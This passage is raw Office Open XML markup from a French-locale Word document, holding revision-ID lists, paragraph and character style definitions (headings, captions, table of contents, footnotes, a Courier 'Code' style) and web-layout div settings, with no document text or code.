    <w:rsid w:val="00D80688"/>
    <w:rsid w:val="00D83465"/>
    <w:rsid w:val="00D837F7"/>
    <w:rsid w:val="00D841CE"/>
    <w:rsid w:val="00D843DF"/>
    <w:rsid w:val="00D844CA"/>
    <w:rsid w:val="00D84BA8"/>
    <w:rsid w:val="00D84F0D"/>
    <w:rsid w:val="00D852CE"/>
    <w:rsid w:val="00D8611D"/>
    <w:rsid w:val="00D86A40"/>
    <w:rsid w:val="00D92A3C"/>
    <w:rsid w:val="00D9659E"/>
    <w:rsid w:val="00D96FEE"/>
    <w:rsid w:val="00DA236B"/>
    <w:rsid w:val="00DA4BEA"/>
    <w:rsid w:val="00DA511F"/>
    <w:rsid w:val="00DA7E95"/>
    <w:rsid w:val="00DB0D27"/>
    <w:rsid w:val="00DB0F3E"/>
    <w:rsid w:val="00DB26B1"/>
    <w:rsid w:val="00DB5185"/>
    <w:rsid w:val="00DB55B1"/>
    <w:rsid w:val="00DB66D2"/>
    <w:rsid w:val="00DB7A8E"/>
    <w:rsid w:val="00DC06B7"/>
    <w:rsid w:val="00DC0ADB"/>
    <w:rsid w:val="00DC10A2"/>
    <w:rsid w:val="00DC23E0"/>
    <w:rsid w:val="00DC3C34"/>
    <w:rsid w:val="00DC4991"/>
    <w:rsid w:val="00DC4C55"/>
    <w:rsid w:val="00DC5B98"/>
    <w:rsid w:val="00DC7406"/>
    <w:rsid w:val="00DC774C"/>
    <w:rsid w:val="00DD2B68"/>
    <w:rsid w:val="00DD2E4A"/>
    <w:rsid w:val="00DD408B"/>
    <w:rsid w:val="00DD497D"/>
    <w:rsid w:val="00DD5481"/>
    <w:rsid w:val="00DD6201"/>
    <w:rsid w:val="00DD65D3"/>
    <w:rsid w:val="00DE1CB1"/>
    <w:rsid w:val="00DE31B5"/>
    <w:rsid w:val="00DF1818"/>
    <w:rsid w:val="00DF306E"/>
    <w:rsid w:val="00DF3464"/>
    <w:rsid w:val="00DF6948"/>
    <w:rsid w:val="00E020A8"/>
    <w:rsid w:val="00E02162"/>
    <w:rsid w:val="00E02752"/>
    <w:rsid w:val="00E03992"/>
    <w:rsid w:val="00E06A36"/>
    <w:rsid w:val="00E10960"/>
    <w:rsid w:val="00E11E01"/>
    <w:rsid w:val="00E12A39"/>
    <w:rsid w:val="00E133AB"/>
    <w:rsid w:val="00E13A6D"/>
    <w:rsid w:val="00E2008D"/>
    <w:rsid w:val="00E20D8B"/>
    <w:rsid w:val="00E21AFD"/>
    <w:rsid w:val="00E22F6C"/>
    <w:rsid w:val="00E2471F"/>
    <w:rsid w:val="00E26486"/>
    <w:rsid w:val="00E32DF6"/>
    <w:rsid w:val="00E333D8"/>
    <w:rsid w:val="00E33AE7"/>
    <w:rsid w:val="00E35C9D"/>
    <w:rsid w:val="00E363CB"/>
    <w:rsid w:val="00E4154F"/>
    <w:rsid w:val="00E41B65"/>
    <w:rsid w:val="00E42CAD"/>
    <w:rsid w:val="00E433AC"/>
    <w:rsid w:val="00E4698A"/>
    <w:rsid w:val="00E5031B"/>
    <w:rsid w:val="00E5190B"/>
    <w:rsid w:val="00E52AA8"/>
    <w:rsid w:val="00E52DE9"/>
    <w:rsid w:val="00E54865"/>
    <w:rsid w:val="00E5711B"/>
    <w:rsid w:val="00E62DE8"/>
    <w:rsid w:val="00E63B6C"/>
    <w:rsid w:val="00E679B3"/>
    <w:rsid w:val="00E7547C"/>
    <w:rsid w:val="00E8246D"/>
    <w:rsid w:val="00E83829"/>
    <w:rsid w:val="00E86C54"/>
    <w:rsid w:val="00E92427"/>
    <w:rsid w:val="00E95807"/>
    <w:rsid w:val="00E9669E"/>
    <w:rsid w:val="00EA0692"/>
    <w:rsid w:val="00EA0C51"/>
    <w:rsid w:val="00EA383E"/>
    <w:rsid w:val="00EA4861"/>
    <w:rsid w:val="00EB136E"/>
    <w:rsid w:val="00EB2498"/>
    <w:rsid w:val="00EB2BEF"/>
    <w:rsid w:val="00EB4CD2"/>
    <w:rsid w:val="00EB5F49"/>
    <w:rsid w:val="00EB6D71"/>
    <w:rsid w:val="00EC2231"/>
    <w:rsid w:val="00EC2DC7"/>
    <w:rsid w:val="00EC3011"/>
    <w:rsid w:val="00EC53E6"/>
    <w:rsid w:val="00EC747A"/>
    <w:rsid w:val="00ED00E3"/>
    <w:rsid w:val="00ED088B"/>
    <w:rsid w:val="00ED39F6"/>
    <w:rsid w:val="00ED5CA3"/>
    <w:rsid w:val="00ED74E6"/>
    <w:rsid w:val="00EE063E"/>
    <w:rsid w:val="00EE0F6C"/>
    <w:rsid w:val="00EE1788"/>
    <w:rsid w:val="00EE1D37"/>
    <w:rsid w:val="00EE2CB7"/>
    <w:rsid w:val="00EE4058"/>
    <w:rsid w:val="00EE4DF8"/>
    <w:rsid w:val="00EE5E60"/>
    <w:rsid w:val="00EE6939"/>
    <w:rsid w:val="00EF2A9B"/>
    <w:rsid w:val="00EF31C8"/>
    <w:rsid w:val="00EF69F5"/>
    <w:rsid w:val="00EF6BA2"/>
    <w:rsid w:val="00EF7840"/>
    <w:rsid w:val="00F043BA"/>
    <w:rsid w:val="00F05780"/>
    <w:rsid w:val="00F124CF"/>
    <w:rsid w:val="00F12924"/>
    <w:rsid w:val="00F1740F"/>
    <w:rsid w:val="00F208FC"/>
    <w:rsid w:val="00F21569"/>
    <w:rsid w:val="00F21762"/>
    <w:rsid w:val="00F2276C"/>
    <w:rsid w:val="00F22B74"/>
    <w:rsid w:val="00F22F16"/>
    <w:rsid w:val="00F23A93"/>
    <w:rsid w:val="00F241C2"/>
    <w:rsid w:val="00F245D0"/>
    <w:rsid w:val="00F258D9"/>
    <w:rsid w:val="00F26249"/>
    <w:rsid w:val="00F3078B"/>
    <w:rsid w:val="00F309B7"/>
    <w:rsid w:val="00F3110C"/>
    <w:rsid w:val="00F31173"/>
    <w:rsid w:val="00F316CB"/>
    <w:rsid w:val="00F36C54"/>
    <w:rsid w:val="00F36E93"/>
    <w:rsid w:val="00F372AB"/>
    <w:rsid w:val="00F40A73"/>
    <w:rsid w:val="00F4125D"/>
    <w:rsid w:val="00F438EC"/>
    <w:rsid w:val="00F47208"/>
    <w:rsid w:val="00F51E34"/>
    <w:rsid w:val="00F52BBF"/>
    <w:rsid w:val="00F57E68"/>
    <w:rsid w:val="00F57F97"/>
    <w:rsid w:val="00F60561"/>
    <w:rsid w:val="00F60D7D"/>
    <w:rsid w:val="00F6489D"/>
    <w:rsid w:val="00F67DE6"/>
    <w:rsid w:val="00F706A0"/>
    <w:rsid w:val="00F73284"/>
    <w:rsid w:val="00F743D1"/>
    <w:rsid w:val="00F75E3E"/>
    <w:rsid w:val="00F75F79"/>
    <w:rsid w:val="00F76A05"/>
    <w:rsid w:val="00F76ED2"/>
    <w:rsid w:val="00F7700F"/>
    <w:rsid w:val="00F821B4"/>
    <w:rsid w:val="00F822CD"/>
    <w:rsid w:val="00F83AA1"/>
    <w:rsid w:val="00F8525C"/>
    <w:rsid w:val="00F85769"/>
    <w:rsid w:val="00F90DE9"/>
    <w:rsid w:val="00F92D79"/>
    <w:rsid w:val="00F93C46"/>
    <w:rsid w:val="00F96ACC"/>
    <w:rsid w:val="00F971CF"/>
    <w:rsid w:val="00FA085B"/>
    <w:rsid w:val="00FA23B1"/>
    <w:rsid w:val="00FA2984"/>
    <w:rsid w:val="00FA2A4F"/>
    <w:rsid w:val="00FA7B10"/>
    <w:rsid w:val="00FB10A6"/>
    <w:rsid w:val="00FB22AD"/>
    <w:rsid w:val="00FB246A"/>
    <w:rsid w:val="00FB256B"/>
    <w:rsid w:val="00FB2884"/>
    <w:rsid w:val="00FB38CF"/>
    <w:rsid w:val="00FC0DBC"/>
    <w:rsid w:val="00FC1762"/>
    <w:rsid w:val="00FC1D06"/>
    <w:rsid w:val="00FC3102"/>
    <w:rsid w:val="00FC310A"/>
    <w:rsid w:val="00FC47DF"/>
    <w:rsid w:val="00FC5EA3"/>
    <w:rsid w:val="00FD315A"/>
    <w:rsid w:val="00FD6B34"/>
    <w:rsid w:val="00FE5DA9"/>
    <w:rsid w:val="00FE70A0"/>
    <w:rsid w:val="00FE760C"/>
    <w:rsid w:val="00FF0C3F"/>
    <w:rsid w:val="00FF20C8"/>
    <w:rsid w:val="00FF2862"/>
    <w:rsid w:val="00FF5BA6"/>
    <w:rsid w:val="00FF62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C5004"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7086DB9A-C1D0-4084-8E5E-3721F7DA4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DA9"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00205BC0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="38"/>
      </w:numPr>
      <w:spacing w:before="720" w:after="440"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00377B56"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="19"/>
      </w:numPr>
      <w:spacing w:before="400" w:after="320"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001049A1"/>
    <w:pPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre4">
    <w:name w:val="heading 4"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre4Car"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00240A6F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="68"/>
      </w:numPr>
      <w:spacing w:before="80" w:after="120"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre5Car"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0003498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34981"/>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34981"/>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34981"/>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34981"/>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5BC0"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00377B56"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="001049A1"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00240A6F"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre5Car">
    <w:name w:val="Titre 5 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0003498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3498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3498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3498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34981"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Titre1"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitreCar"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00205BC0"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitreCar">
    <w:name w:val="Titre Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00205BC0"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sous-titre">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Sous-titreCar"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="0003498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3498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34981"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CitationCar">
    <w:name w:val="Citation Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Citation"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00034981"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00034981"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuationintense">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00034981"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citationintense">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CitationintenseCar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="000349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34981"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Rfrenceintense">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00034981"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="En-tteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00713C0B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00713C0B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00713C0B"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4536"/>
        <w:tab w:val="right" w:pos="9072"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
    <w:name w:val="Pied de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Pieddepage"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00713C0B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC7406"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mentionnonrsolue">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC7406"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertextesuivivisit">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A6088A"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titre1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00326B4B"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="fr-FR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B37B92"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
      </w:tabs>
      <w:spacing w:after="100"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B37B92"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="lt-line-clampraw-line">
    <w:name w:val="lt-line-clamp__raw-line"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="004C7DD7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Lgende">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B32326"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0E2841" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0083635C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Tabledesillustrations">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F12924"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001049A1"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Notedebasdepage">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NotedebasdepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE1CB1"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NotedebasdepageCar">
    <w:name w:val="Note de bas de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Notedebasdepage"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00DE1CB1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Appelnotedebasdep">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DE1CB1"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textedelespacerserv">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00EF6BA2"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:aliases w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="SansinterligneCar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00115706"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SansinterligneCar">
    <w:name w:val="Sans interligne Car"/>
    <w:aliases w:val="Code Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Sansinterligne"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00115706"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="006E657A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CodeHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00986BBC"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00986B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0540">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1197540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44577">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1072657666">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="783764530">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
